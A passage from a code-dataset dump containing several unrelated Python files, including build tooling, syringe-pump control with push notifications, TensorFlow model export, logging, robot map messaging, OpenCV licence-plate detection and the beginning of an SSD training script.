pre_clean=False, post_clean=False):\n # Clean Application before build if requested\n if pre_clean:\n build_status = self.build_target(app, parallel=parallel, target=str('clean'))\n if not build_status['result']:\n return build_status\n\n # Build Application\n build_status = self.build_target(app, parallel=parallel, target=str('bin'))\n if not build_status['result']:\n return build_status\n # Clean Application after build if requested\n if post_clean:\n clean_status = self.build_target(app, parallel=parallel, target=str('clean'))\n if not clean_status['result']:\n return clean_status\n\n return build_status\n\n def build_hex(self, app, parallel=False, pre_clean=False, post_clean=False):\n # Clean Application before build if requested\n if pre_clean:\n build_status = self.build_target(app, parallel=parallel, target=str('clean'))\n if not build_status['result']:\n return build_status\n\n # Build Application\n build_status = self.build_target(app, parallel=parallel, target=str('hex'))\n if not build_status['result']:\n return build_status\n # Clean Application after build if requested\n if post_clean:\n clean_status = self.build_target(app, parallel=parallel, target=str('clean'))\n if not clean_status['result']:\n return clean_status\n\n return build_status\n\n def get_build_size(self, app, parallel=False, silent=False):\n build_status = self.build_target(app, parallel=parallel, target=str('size'), silent=silent)\n build_size = dict()\n if build_status['result']:\n app_size_lines = build_status['build_msg']\n len_app_size_lines = len(app_size_lines)\n if len_app_size_lines >= 3:\n app_size_lines = app_size_lines[len_app_size_lines - 2:]\n section_names = app_size_lines[0].split()\n section_values = app_size_lines[1].split()\n for idx, section_name in enumerate(section_names):\n if section_name in BUILD_SIZE_SECTION_NAMES:\n build_size[section_name] = int(section_values[idx])\n else:\n build_status['result'] = False\n else:\n print_string(\"Build failed and there is no size information\")\n build_status['build_size'] = build_size\n return build_status\n\n def clean(self, app, parallel=False):\n build_status = self.build_target(app, target=str('clean'), parallel=parallel)\n return build_status\n\n def distclean(self, app, parallel=False):\n build_status = self.build_target(app, target=str('distclean'), parallel=parallel)\n return build_status\n\n def boardclean(self, app, parallel=False):\n build_status = self.build_target(app, target=str('boardclean'), parallel=parallel)\n return build_status\n\n def get_makefile_config(self, build_template=None):\n # current_build_templates = dict()\n ospclass = osp.OSP()\n build_template[\"APPL\"] = self.buildopts.get(\"APPL\", False)\n build_template[\"BOARD\"] = self.buildopts.get(\"BOARD\", False)\n build_template[\"BD_VER\"] = self.buildopts.get(\"BD_VER\", False)\n build_template[\"CUR_CORE\"] = self.buildopts.get(\"CUR_CORE\", False)\n build_template[\"TOOLCHAIN\"] = self.buildopts.get(\"TOOLCHAIN\", False)\n build_template[\"OLEVEL\"] = self.buildopts.get(\"OLEVEL\", False)\n osp_root = self.buildopts.get(\"EMBARC_OSP_ROOT\", False)\n\n if not all(build_template.values()):\n default_makefile_config = dict()\n _, default_makefile_config = ospclass.get_makefile_config(default_makefile_config)\n if not osp_root:\n osp_root = default_makefile_config.get(\"EMBARC_OSP_ROOT\")\n for key, value in build_template.items():\n if not value:\n build_template[key] = default_makefile_config.get(key, False)\n self.buildopts.update(build_template)\n\n osp_root, update = ospclass.check_osp(osp_root)\n self.make_options += 'EMBARC_ROOT=' + str(osp_root) + ' '\n self.buildopts[\"EMBARC_OSP_ROOT\"] = osp_root\n build_template[\"EMBARC_OSP_ROOT\"] = osp_root\n\n if not all(build_template.values()):\n try:\n returncode, cmd_output = pqueryTemporaryFile([\"make\", \"EMBARC_ROOT=\" + str(osp_root), \"info\"])\n default_build_option = None\n if not returncode and cmd_output:\n for line in cmd_output:\n if line.startswith(\"BUILD_OPTION\"):\n default_build_option = str(line.split(\":\", 1)[1]).split()\n break\n else:\n pass\n default_build_option_dict, _ = get_config(default_build_option)\n for key, value in build_template.items():\n if not value:\n build_template[key] = default_build_option_dict[key]\n self.buildopts.update(build_template)\n except Exception as e:\n print_string(\"Error: {}\".format(e))\n sys.exit(1)\n\n current_build_list = [\"%s=%s\" % (opt, build_template[opt]) for opt in BUILD_CONFIG_TEMPLATE.keys()]\n self.make_options = self.make_options + \" \".join(current_build_list)\n\n self.buildopts.update(build_template)\n generate_json(self.buildopts, self.embarc_config)\n\n print_string(\"Current configuration \")\n table_head = list()\n table_content = list()\n for key, value in build_template.items():\n table_head.append(key)\n table_content.append(value)\n msg = [table_head, [table_content]]\n print_table(msg)\n self.osproot = osp_root\n return build_template\n\n def get_build_template(self):\n\n build_template = BUILD_CONFIG_TEMPLATE\n build_template = collections.OrderedDict()\n return build_template\n","sub_path":"embarc_tools/builder/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":23992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"66420523","text":"import numpy as np\nimport librosa\ny, sr = librosa.load('audio.wav', sr=32000) \n\n# N = input(\"Enter the value of N(no. of bits) : \")\nN = 4 #4 bit quantizer\nlength = 320000\narr = []\nfinal1 = []\nfinal2 = []\n# print(\"Enter you array one by one \")\nfor x in range(length):\n arr.append(y[x])\n\nb = arr[0]\nfor x in range(length):\n if arr[x] > b:\n b = arr[x]\n\na = arr[0]\nfor x in range(length):\n if arr[x] < a:\n a = arr[x]\ncount = 0\nfor x in arr:\n final1.append((x-a)/(b-a)*(pow(2, N)-1))\n final1[count] = int(final1[count])\n final2.append(final1[count]*(b-a)/(pow(2, N)-1)+a)\n # final2[count] = int(final2[count])\n count = count+1\nfff = np.array(final2)\n\n# print(final2)\nlibrosa.output.write_wav('output_audio.wav', fff, sr)\n","sub_path":"DSP/1.2.1/1.2.1b.py","file_name":"1.2.1b.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"643240697","text":"import sys\nimport pumpy\nimport logging\nimport time\nimport os\n# Push notification stuff\n\nimport httplib, urllib\n\npushover_user_key = os.environ['PUSHOVER_USER_KEY']\npushover_app_key = os.environ['PUSHOVER_PUMPY_APP_TOKEN']\n\n# Pusher\ndef push(message):\n conn = httplib.HTTPSConnection(\"api.pushover.net:443\")\n conn.request(\"POST\", \"/1/messages.json\",\n urllib.urlencode({\n \"token\": pushover_app_key,\n \"user\": pushover_user_key,\n \"message\": message,\n }), { \"Content-type\": \"application/x-www-form-urlencoded\" })\n conn.getresponse()\n\n\nlogging.basicConfig(level=logging.INFO)\n\nchain = pumpy.Chain('../../../../../dev/ttyUSB0')\nbufferPump = pumpy.PHD2000(chain,address=1, name=\"Buffer\") # PHD2000\ndosePump = pumpy.PHD2000(chain,address=12, name=\"Dose\") # special pump\n\n\n#Experimental Setup\n#Set flow rate for whole experiment\nglobalFlowRate = 100\n\ndoseList = [0.00,10.00,20.00,30.00,40.00,50.00,60.00,70.00,80.00,90.00,100.00]\n\n# Set diameters BD plastpak 10mL\nbufferPump.setdiameter(14.5)\ndosePump.setdiameter(14.5)\n\n# accepts a percent of the flow as a dosing, and how long one wants to dose for.\ndef doseIt(dose, doseTime):\n # blank condition\n if dose == 0:\n bufferPump.setflowrate(((100.00-dose)/100.00) * globalFlowRate)\n\n bufferPump.infuse()\n\n logging.info('Infusion started at ' + str(dose)) #+ 'percent dose for ' str((doseTime/60)) +'minutes...')\n time.sleep( doseTime )\n\n bufferPump.stop()\n logging.info('Infusion finished at ' + str(dose)) #+ 'percent dose for ' str((doseTime/60)) +'minutes...')\n else:\n bufferPump.setflowrate(((100.00-dose)/100.00) * globalFlowRate)\n dosePump.setflowrate((dose/100.00) * globalFlowRate)\n\n bufferPump.infuse()\n dosePump.infuse()\n\n logging.info('Infusion started at ' + str(dose)) #+ 'percent dose for ' str((doseTime/60)) +'minutes...')\n time.sleep( doseTime )\n\n bufferPump.stop()\n dosePump.stop()\n logging.info('Infusion finished at ' + str(dose)) #+ 'percent dose for ' str((doseTime/60)) +'minutes...')\n\n#iterates through a list of dosing percents and sens that to the infuse function.\ndef multiDoseIt(doses, doseTime):\n for dose in doses:\n doseIt(dose, doseTime)\n push(\"Started \" + str(dose) + \"% dose\")\n return logging.info('Next!')\n\n######## Experimental Protocol ###################\n# Does a 10 minut equilibration, followed by 10 different\n# doses with 5 minutes of dosing at each.\n\ndoseIt(0, 45 * 60) #single dose of buffer for 45 minutes to equilibrate\nmultiDoseIt(doseList, 5*60) #dose time of 5 mins\npush(\"Job Complete :)\")\nsys.exit()\n","sub_path":"01_12_2014_sanjiv.py","file_name":"01_12_2014_sanjiv.py","file_ext":"py","file_size_in_byte":2644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"313451773","text":"import os.path\nimport shutil\nimport re\n\nimport tensorflow as tf\nimport tensorflow_hub as hub\n\nimport tf_graph_util\n\ngraph = tf.Graph()\n\nwith graph.as_default():\n embed = hub.Module(\"https://tfhub.dev/google/nnlm-ja-dim50-with-normalization/1\")\n\n pl = tf.placeholder(shape=[None], dtype=tf.string)\n\n vector = tf.identity(embed(pl), name=\"OUTPUT\")\n\n savedmodel_dir = \"nnlm_ja_dim50_savedmodel\"\n tmp_savedmodel_dir = savedmodel_dir + \"_tmp\"\n if (os.path.exists(tmp_savedmodel_dir)):\n shutil.rmtree(tmp_savedmodel_dir)\n with tf.Session(graph=graph) as sess:\n sess.run([tf.global_variables_initializer(), tf.tables_initializer()])\n tf.saved_model.simple_save(sess, tmp_savedmodel_dir, inputs={\"text\":pl}, outputs={\"vector\": vector})\n\ndef freeze_graph(input_saved_model_dir, output_saved_model_dir, node_names):\n with tf.Session() as sess:\n meta_graph_def = tf.saved_model.loader.load(sess, [tf.saved_model.tag_constants.SERVING], input_saved_model_dir)\n node_names = node_names + [n for n in meta_graph_def.collection_def[\"table_initializer\"].node_list.value]\n node_names = node_names + [re.sub(r':\\d$', \"\", n) for n in meta_graph_def.collection_def[\"asset_filepaths\"].node_list.value]\n #frozen_graph_def = tf.graph_util.convert_variables_to_constants(sess, meta_graph_def.graph_def, node_names)\n frozen_graph_def = tf_graph_util.convert_variables_to_constants(sess, meta_graph_def.graph_def, node_names)\n\n if tf.gfile.IsDirectory(output_saved_model_dir):\n tf.gfile.DeleteRecursively(output_saved_model_dir)\n with tf.Graph().as_default() as graph:\n tf.import_graph_def(frozen_graph_def, name=\"\")\n if len(meta_graph_def.collection_def[\"table_initializer\"].node_list.value) > 0:\n main_op = graph.get_operation_by_name(meta_graph_def.collection_def[\"table_initializer\"].node_list.value[0])\n else:\n main_op = None\n assets = meta_graph_def.collection_def[\"asset_filepaths\"].node_list.value\n assets = [graph.get_tensor_by_name(n) for n in assets]\n with tf.Session() as sess:\n builder = tf.saved_model.builder.SavedModelBuilder(output_saved_model_dir)\n builder.add_meta_graph_and_variables(\n sess, [tf.saved_model.tag_constants.SERVING],\n signature_def_map=meta_graph_def.signature_def,\n assets_collection=assets,\n main_op=main_op)\n builder.save()\n\nfreeze_graph(tmp_savedmodel_dir, savedmodel_dir, [\"OUTPUT\"])\nshutil.rmtree(tmp_savedmodel_dir)\n","sub_path":"models/text_embeddings/nnlm_ja_dim50_export_savedmodel.py","file_name":"nnlm_ja_dim50_export_savedmodel.py","file_ext":"py","file_size_in_byte":2598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"379593052","text":"import json\nimport os\n\n\ndef jtring2p(jtring):\n \"\"\"parse\"\"\"\n\n if jtring:\n rs = json.loads(\"[\" + jtring[:-2] + \"]\")\n else:\n rs = []\n return rs\n\n\ndef fput_string(fp, content: dict):\n \"\"\"add\"\"\"\n\n ipdn = -1\n\n if not os.path.exists(fp):\n with open(fp, \"w\"):\n pass\n else:\n with open(fp, \"r\") as f:\n while True:\n raw_content = f.readline()\n if not raw_content:\n break\n ipdn += 1\n\n content.update({\"ipdn\": int(ipdn + 1)})\n\n jtr = json.dumps(content, ensure_ascii=False)\n\n with open(fp, \"a\", encoding=\"utf8\") as f:\n\n f.write(f'{jtr},\\n')\n\n\ndef fget_string(fp, jtr2p=None):\n \"\"\"read\"\"\"\n\n jtr2p = jtr2p or jtring2p\n\n with open(fp, \"r\", encoding=\"utf8\") as f:\n content = f.read()\n\n return jtr2p(content)\n\n\ndef fupdate_string(fp, attr, content):\n \"\"\"create or update\"\"\"\n\n if not os.path.exists(fp):\n with open(fp, \"w\") as f:\n content.update({\"ipdn\": 0})\n jtr = json.dumps(content, ensure_ascii=False)\n f.write(f'{jtr},\\n')\n\n return 0\n\n with open(fp, \"r\") as f:\n raw_content = json.loads(\"[\" + f.read()[:-2] + \"]\")\n\n ipdn = None\n for raw in raw_content:\n if content.get(attr) == raw.get(attr):\n ipdn = raw.get(\"ipdn\")\n break\n\n if ipdn is not None:\n content.update({\"ipdn\": ipdn})\n raw_content[ipdn] = content\n else:\n ipdn = len(raw_content)\n content.update({\"ipdn\": ipdn})\n raw_content.append(content)\n\n with open(fp, \"w+\") as f:\n for raw in raw_content:\n jtr = json.dumps(raw, ensure_ascii=False)\n f.write(f'{jtr},\\n')\n\n return ipdn\n\n\nif __name__ == \"__main__\":\n\n print(fupdate_string(\"test.dpt\", \"type\", {\"type\": \"ping3\", \"analyze\": {\"cmd\": \"fping -a baidu.com\", \"avg\": 30}}))\n print(fget_string(\"test.dpt\"))\n","sub_path":"jtring.py","file_name":"jtring.py","file_ext":"py","file_size_in_byte":1949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"414827579","text":"import logging\nimport time\nimport os.path\n\n\n# 创建logger实例\nlogger_name = 'mylogger'\nlogger = logging.getLogger(logger_name)\n# 设置日志级别 即只有日志级别大于等于DEBUG的日志才会输出\nlogger.setLevel(logging.DEBUG)\n\n\n# 以当天日期作为日志名称\nct = time.strftime('%Y-%m-%d', time.localtime(time.time()))\n# os.path.dirname()获取指定文件路径的上级路径\npath_dir = os.path.dirname(__file__)\nlog_path = os.path.abspath(os.path.dirname(path_dir))+'/log'\nlog_name = os.path.join(log_path, ct+'.log')\n\n# 创建FileHandler处理器 将warn级别及以上的日志信息输出到指定文件\nfh = logging.FileHandler(log_name, encoding='utf8')\nfh.setLevel(logging.WARNING)\n\n\n# 创建StremHandler处理器 将DEBUG级别及以上的日志信息输出到控制台\nsh = logging.StreamHandler()\n# sh.setLevel(logging.DEBUG)\n\n\n# 设置输出格式\n# asctime:打印日志的世界 levename:打印日志级别名称 funcname:打印日志的当前函数 message:打印日志信息\nfmt = '%(asctime)s - %(levelname)s - %(message)s'\ndatefmt = '%Y-%m-%d %H:%M:%S'\nformatter = logging.Formatter(fmt, datefmt)\n\n\n# 添加处理器和格式到logger\nfh.setFormatter(formatter)\nsh.setFormatter(formatter)\nlogger.addHandler(fh)\nlogger.addHandler(sh)\n\n\ndef debug(message):\n logger.debug(message)\n\n\ndef info(message):\n logger.info(message)\n\n\ndef warning(message):\n logger.warning(message)\n\n\ndef error(message):\n logger.error(message)\n\n\ndef exception(e):\n logger.exception(e)\n# 测试\n# logger.warning('张欢的自动化测试框架')\n","sub_path":"Common/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":1574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"624138372","text":"#! /usr/bin/env python\n\n# @file submit_grid.py\n# @author Joakim Olsson \n# @brief Launch grid jobs with the MLTree package\n# @date October 2016\n\nimport os\nimport subprocess as sp\n\ntry:\n __version__ = sp.check_output([\"git\",\"describe\",\"--tags\"], cwd=os.path.dirname(os.path.realpath(__file__))).strip()\nexcept:\n print(\"git not available to extract current tag\")\n __version__ = \"test\"\n\nimport argparse\nparser = argparse.ArgumentParser(add_help=True, description=\"Launch grid jobs\", epilog=\"version: {0:s}\".format(__version__))\nparser.add_argument(\"--user\", required=True, type=str, dest=\"user\", metavar=\"\", help=\"Username\")\nparser.add_argument(\"--tag\", required=False, type=str, dest=\"tag\", default = __version__, metavar=\"\", help=\"Output file tag\")\nparser.add_argument(\"--datasets\", type=str, dest=\"datasets\", required=False, default=\"datasets.json\", metavar = \"\", help=\"JSON file specifying the input and output datasets.\")\nparser.add_argument(\"--nFilesPerJob\", required=False, type=int, dest=\"nFilesPerJob\", default=1, help=\"Number of files per job\")\n# If sub-jobs exceed the walltime limit, they will get killed. When you want to submit long running jobs (e.g., customized G4 simulation), submit them to sites where longer walltime limit is available by specifying the expected execution time (in second) to the --maxCpuCount option.\nparser.add_argument(\"--maxCpuCount\", required=False, type=int, dest=\"maxCpuCount\", default=172800, help=\"Max CPU time (default: 48 hrs)\")\nparser.add_argument(\"--dry-run\", dest=\"dryrun\", action=\"store_true\", help=\"Don't submit any jobs\")\nargs = parser.parse_args()\n\nimport json\ndatasets = json.load(file(args.datasets))\ninDSs = datasets.get(\"inDSs\", {})\noutDSs = datasets.get(\"outDSs\", {})\n\ndoBuild = True\ndoBuildAll = True\n\nsetup = \"MLTree/MLTreeMaker.py\"\nconfig = \"--nFilesPerJob \"+str(args.nFilesPerJob)+\" --maxCpuCount \"+str(args.maxCpuCount)\n\ncomFirst = \"pathena {} --outDS {} --inDS {} {}\"\ncomLater = \"pathena {} --outDS {} --inDS {} --libDS LAST {}\"\n\n# Submit jobs to the grid with pathena\n# https://twiki.cern.ch/twiki/bin/view/PanDA/PandaAthena\nfor i, inDS, outDS in zip(xrange(len(inDSs)), inDSs, outDSs):\n outDS = \"user.\"+args.user+\".\"+outDS+\"_\"+args.tag\n if (i==0 and doBuild) or doBuildAll:\n command = comFirst.format(setup, outDS, inDS, config)\n else:\n command = comLater.format(setup, outDS, inDS, config)\n sp.call(\"echo \"+command, shell=True)\n if not args.dryrun:\n sp.call(command, shell=True)\n","sub_path":"python/launch_jobs.py","file_name":"launch_jobs.py","file_ext":"py","file_size_in_byte":2523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"365090332","text":"import json\nimport socket\n\nROWS = 20\nCOLUMNS = 15\n\n\nclass Cell: # contains cell data for each cell on the grid.\n def __init__(self, row_, column_, explored):\n self.obstacle = 0\n self.virtual_wall = 0\n self.explored = explored\n self.row = row_\n self.column = column_\n\n\nclass Connection:\n def __init__(self):\n self.socket = 0\n self.host = '192.168.22.1'\n self.port = 9999\n\n def connect_to_rpi(self):\n self.socket = socket.create_connection((self.host, self.port))\n if socket is not 0:\n print(\"connected successfully\")\n\n def send_to_rpi(self, message):\n try:\n self.socket.sendall(message)\n except Exception as e:\n print(e)\n\n def close_connection(self):\n self.socket.close()\n\n def get_socket_instance(self):\n return self.socket\n\n\ndef create_maze_grid(rows, columns): # creates grid and updates it with cell objects. Returns grid list.\n grid_temp = []\n for row in range(rows):\n grid_temp.append([])\n for column in range(columns):\n cell = Cell(row, column, 0)\n if row > 16 and column < 3:\n cell.explored = 1\n if row < 1 or row > 18 or column < 1 or column > 13:\n cell.virtual_wall = 1\n grid_temp[row].append(cell)\n\n return grid_temp\n\n\ndef main():\n grid = create_maze_grid(ROWS, COLUMNS)\n connection = Connection()\n connection.connect_to_rpi()\n s = connection.get_socket_instance()\n mdf_status_update = make_mdf_string(grid)\n connection.send_to_rpi(mdf_status_update.encode('UTF-8'))\n reply = s.recv(1024)\n print(reply)\n connection.close_connection()\n\n\ndef make_mdf_string(grid):\n mdf_exploration = '11'\n mdf_obstacle = ''\n for i in range(ROWS-1, -1, -1):\n for j in range(COLUMNS):\n mdf_exploration = mdf_exploration + str(grid[i][j].explored)\n if grid[i][j].explored == 1:\n mdf_obstacle = mdf_obstacle + str(grid[i][j].obstacle)\n\n if len(mdf_obstacle) % 8 is not 0:\n dummy = '0'*(8 - (len(mdf_obstacle) % 8))\n mdf_obstacle = dummy + mdf_obstacle\n\n mdf_exploration = mdf_exploration + '11'\n mdf_exploration_hex = hex(int(mdf_exploration, 2))[2:]\n mdf_obstacle_hex = hex(int(mdf_obstacle, 2))[2:]\n no_of_digits_obs = int(len(mdf_obstacle) / 4)\n mdf_obstacle_hex = \"0\" * (no_of_digits_obs - len(mdf_obstacle_hex)) + mdf_obstacle_hex\n mdf_json = {'map': {'exploration': mdf_exploration_hex,\n 'obstacle': mdf_obstacle_hex}}\n mdf_json = json.dumps(mdf_json)\n mdf_json = 'a|' + mdf_json\n\n return mdf_json\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"src/Comm_test.py","file_name":"Comm_test.py","file_ext":"py","file_size_in_byte":2727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"363479611","text":"import cv2\n# Opencv Kütüphanesini Projeme Dahil ediyorum.\nimport numpy as np\n#Numpy kütühanesi dahil etme işlemi // Maskeleme işlemlerinde kullanılacak\n\ndef resimAc(sec):\n # Dosyadan resim okumak için dosyamın yolunu seciyoruz.\n img = cv2.imread(\"Resim/\" + sec)\n cv2.namedWindow(\"1-Orjinal Resim\", cv2.WINDOW_NORMAL)\n # resm göstermek için bir pencere oluşturma\n cv2.imshow(\"1-Orjinal Resim\", img)\n # Ekranda resim gösterme işlemi\n return img\n\n# RGB uzayından Gri seviyeli resme dönüş işlemi\ndef griyecevir(img):\n img_gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n cv2.namedWindow(\"2-Griye Donusturme İslemi\", cv2.WINDOW_NORMAL)\n # Pencre Oluştur\n cv2.imshow(\"2-Griye Donusturme İslemi\", img_gray)\n # Resmi Göster\n return img_gray\n\n#2. Gauss Filtreleme , Medyan ortalama ile aynı işi yapan fonk.\n## gürültü azaltıcı yumuşatma işlemi\n#Her pikselin yoğunluğunu, yakındaki piksellerin yoğunluk ortalamasının ağırlıklı ortalaması ile değiştirir\n#Diğer üç filtre kenarları pürüzsüz hale getirirken sesleri kaldırır, ancak bu filtre, kenar #koruyarak görüntünün gürültüyü azaltabilir. \n\ndef gurultuAzalt(img_gray):\n gurultuazalt = cv2.bilateralFilter(img_gray, 9, 75, 75)\n cv2.namedWindow(\"3-Gürültü Temizleme islemi\", cv2.WINDOW_NORMAL)\n cv2.imshow(\"3-Gürültü Temizleme islemi\", gurultuazalt)\n return gurultuazalt\n\n# Daha iyi sonuç elde etmek için histogram eşitleme işlemi yapıyoruz\ndef histogramEsitleme(gurultuazalt):\n histogram_e = cv2.equalizeHist(gurultuazalt)\n cv2.namedWindow(\"4-Histogram esitleme islemi\", cv2.WINDOW_NORMAL)\n cv2.imshow(\"4-Histogram esitleme islemi\", histogram_e)\n return histogram_e\n\n\n# Açma İşlemi(Opening):\n#Aşındırma ile küçük parçalar yok edildikten sonra dilation ile görüntü tekrar genişletilerek küçük parçaların kaybolması sağlanır.\n#gürültülerin etkisi azaltılır.\ndef morfolojikIslem(h_esitleme):\n kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (5, 5))\n morfolojikresim = cv2.morphologyEx(h_esitleme, cv2.MORPH_OPEN, kernel, iterations=15)\n cv2.namedWindow(\"5-Morfolojik acilim\", cv2.WINDOW_NORMAL)\n cv2.imshow(\"5-Morfolojik acilim\", morfolojikresim)\n return morfolojikresim\n\n\n#Resim üzerinde düzensiz bölümleri dengelemek.\n# veya iki resim arasındaki değişiklikleri saptamak için görüntü çıkarma kullanılır.(Image subtraction).\ndef goruntuCikarma(h_esitleme,morfolojik_resim):\n # Görüntü çıkarma (Morph görüntüsünü histogram eşitlenmiş görüntüsünden çıkarmak)\n gcikarilmisresim = cv2.subtract(h_esitleme, morfolojik_resim)\n cv2.namedWindow(\"6-Goruntu cikarma\", cv2.WINDOW_NORMAL)\n cv2.imshow(\"6-Goruntu cikarma\", gcikarilmisresim)\n return gcikarilmisresim\n\n\n\n# görüntüdeki her pikseli siyah bir piksel ile değiştirir; Formul var ona göre yapıyor\n# görüntü yoğunluğu bu sabitten büyükse beyaz bir piksel\ndef goruntuEsikle(goruntucikarma):\n ret, goruntuesikle = cv2.threshold(goruntucikarma, 0, 255, cv2.THRESH_OTSU)\n cv2.namedWindow(\"7-Goruntu Esikleme\", cv2.WINDOW_NORMAL)\n cv2.imshow(\"7-Goruntu Esikleme\", goruntuesikle)\n return goruntuesikle\n\n\n#Görüntünün kenarlarını algılamak için canny edge kullandım\ndef cannyEdge(goruntuesikleme):\n canny_goruntu = cv2.Canny(goruntuesikleme, 250, 255)\n cv2.namedWindow(\"8-Canny Edge\", cv2.WINDOW_NORMAL)\n cv2.imshow(\"8-Canny Edge\", canny_goruntu)\n canny_goruntu = cv2.convertScaleAbs(canny_goruntu)\n return canny_goruntu\n\n\n#Dilatasyon operatörü, girdi olarak iki veri alanını alır.\n# Birincisi dilate edilecek olan resimdir. İkincisi, yapılandırma unsuru cekirdek\n#Dilate, Büyümek, Genişletmek\ndef genisletmeIslemi(cannedge_goruntu):\n # Kenarları güçlendirmek için genleşme\n cekirdek = np.ones((3, 3), np.uint8)\n # Genişletme için çekirdek oluşturma\n gen_goruntu = cv2.dilate(cannedge_goruntu, cekirdek, iterations=1)\n cv2.namedWindow(\"9-Genisletme\", cv2.WINDOW_NORMAL)\n cv2.imshow(\"9-Genisletme\", gen_goruntu)\n return gen_goruntu\n\n\ndef konturIslemi(img,gen_goruntu):\n # Kenarlara dayanan resimdeki Konturları Bulma\n new, contours, hierarchy = cv2.findContours(gen_goruntu, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n contours = sorted(contours, key=cv2.contourArea, reverse=True)[:10]\n # Rakamları alana göre sıralama, böylece sayı plakası ilk 10 konturda olacak\n screenCnt = None\n # kontur dng işlemi\n for c in contours:\n # yaklaşık çizgi belirliyoruz\n peri = cv2.arcLength(c, True)\n approx = cv2.approxPolyDP(c, 0.06 * peri, True) # % 6 hata ile yaklaşıklık\n # Yaklaşık konturuzun dört noktası varsa, o zaman\n # ----Plakamızı yaklaşık olarak bulduğumuzu varsayabiliriz.\n\n if len(approx) == 4: # Konturu 4 köşeli olarak seçiyoruz\n screenCnt = approx\n break\n \t\n final = cv2.drawContours(img, [screenCnt],-1, (9, 236, 255), 3) # KARENİN RENGİ VE ÇİZİMİ\n # Seçilen konturun orijinal resimde çizilmesi\n cv2.namedWindow(\"10-Konturlu Goruntu\", cv2.WINDOW_NORMAL)\n cv2.imshow(\"10-Konturlu Goruntu\", final)\n return screenCnt\n\n##Belirnenen alan dışında kalan yerleri maskeleme\ndef maskelemeIslemi(img_gray,img,screenCnt):\n # Numara plakası dışındaki kısmı maskeleme\n mask = np.zeros(img_gray.shape, np.uint8)\n yeni_goruntu = cv2.drawContours(mask, [screenCnt], 0, 255, -1, )\n yeni_goruntu = cv2.bitwise_and(img, img, mask=mask)\n cv2.namedWindow(\"11-Plaka\", cv2.WINDOW_NORMAL)\n cv2.imshow(\"11-Plaka\", yeni_goruntu)\n return yeni_goruntu\n\ndef plakaIyilestir(yeni_goruntu):\n # Daha fazla işlem için numara plakasını geliştirmek için histogram eşitleme\n y, cr, cb = cv2.split(cv2.cvtColor(yeni_goruntu, cv2.COLOR_RGB2YCrCb))\n # Görüntüyü YCrCb modeline dönüştürme ve 3 kanalı bölme\n y = cv2.equalizeHist(y)\n # Histogram eşitleme uygulama\n son_resim = cv2.cvtColor(cv2.merge([y, cr, cb]), cv2.COLOR_YCrCb2RGB)\n # 3 kanalı birleştirme\n #cv2.namedWindow(\"Gelismis_plaka_no\", cv2.WINDOW_NORMAL)\n #cv2.imshow(\"Gelismis_plaka_no\", son_resim)\n return son_resim\n","sub_path":"fonksiyonlar.py","file_name":"fonksiyonlar.py","file_ext":"py","file_size_in_byte":6256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"543476186","text":"import os\r\nimport pickle\r\nimport sys\r\n\r\nimport cv2\r\nimport keras\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport tensorflow as tf\r\nfrom keras.backend.tensorflow_backend import set_session\r\nfrom keras.callbacks import (EarlyStopping, ModelCheckpoint, ReduceLROnPlateau, TensorBoard)\r\nfrom keras.models import Model\r\nfrom keras.optimizers import Adam\r\nfrom keras.preprocessing import image\r\n\r\nfrom nets.ssd import SSD300\r\nfrom nets.ssd_training import Generator, MultiboxLoss\r\nfrom utils.anchors import get_anchors\r\nfrom utils.utils import BBoxUtility\r\n\r\nfrom keras.utils import multi_gpu_model # add 2021.2.3\r\n\r\n# ----------------------------------------------------#\r\n# 检测精度mAP和pr曲线计算参考视频\r\n# https://www.bilibili.com/video/BV1zE411u7Vw\r\n# ----------------------------------------------------#\r\n\r\n# 调用多GPU训练时需要\r\nclass ParallelModelCheckpoint(ModelCheckpoint):\r\n def __init__(self,model,filepath, monitor='val_loss',\r\n save_weights_only=True,save_best_only=False, period=1):\r\n self.single_model = model\r\n super(ParallelModelCheckpoint,self).__init__(filepath, monitor, save_weights_only, save_best_only, period)\r\n\r\n def set_model(self, model):\r\n super(ParallelModelCheckpoint,self).set_model(self.single_model)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n Cuda = True\r\n log_dir = \"logs/\"\r\n annotation_path = '2007_train.txt'\r\n # ----------------------------------------------------#\r\n # 训练之前一定要修改NUM_CLASSES\r\n # 修改成所需要区分的类的个数+1。\r\n # ----------------------------------------------------#\r\n NUM_CLASSES = 7\r\n # ----------------------------------------------------#\r\n # input_shape有两个选择。\r\n # 一个是(300, 300, 3)、一个是(512, 512, 3)。\r\n # 这里的SSD512不是原版的SSD512。\r\n # 原版的SSD512的比SSD300多一个预测层;\r\n # 修改起来比较麻烦,所以我只是修改了输入大小\r\n # 这样也可以用比较大的图片训练,对于小目标有好处\r\n # ----------------------------------------------------#\r\n input_shape = [300, 300, 3]\r\n\r\n # ----------------------------------------------------#\r\n # 可用于设定先验框的大小,默认的anchors_size\r\n # 是根据voc数据集设定的,大多数情况下都是通用的!\r\n # 如果想要检测小物体,可以修改anchors_size\r\n # 一般调小浅层先验框的大小就行了!因为浅层负责小物体检测!\r\n # 比如anchors_size = [21,45,99,153,207,261,315]\r\n # ----------------------------------------------------#\r\n anchors_size = [30, 60, 111, 162, 213, 264, 315]\r\n priors = get_anchors((input_shape[0], 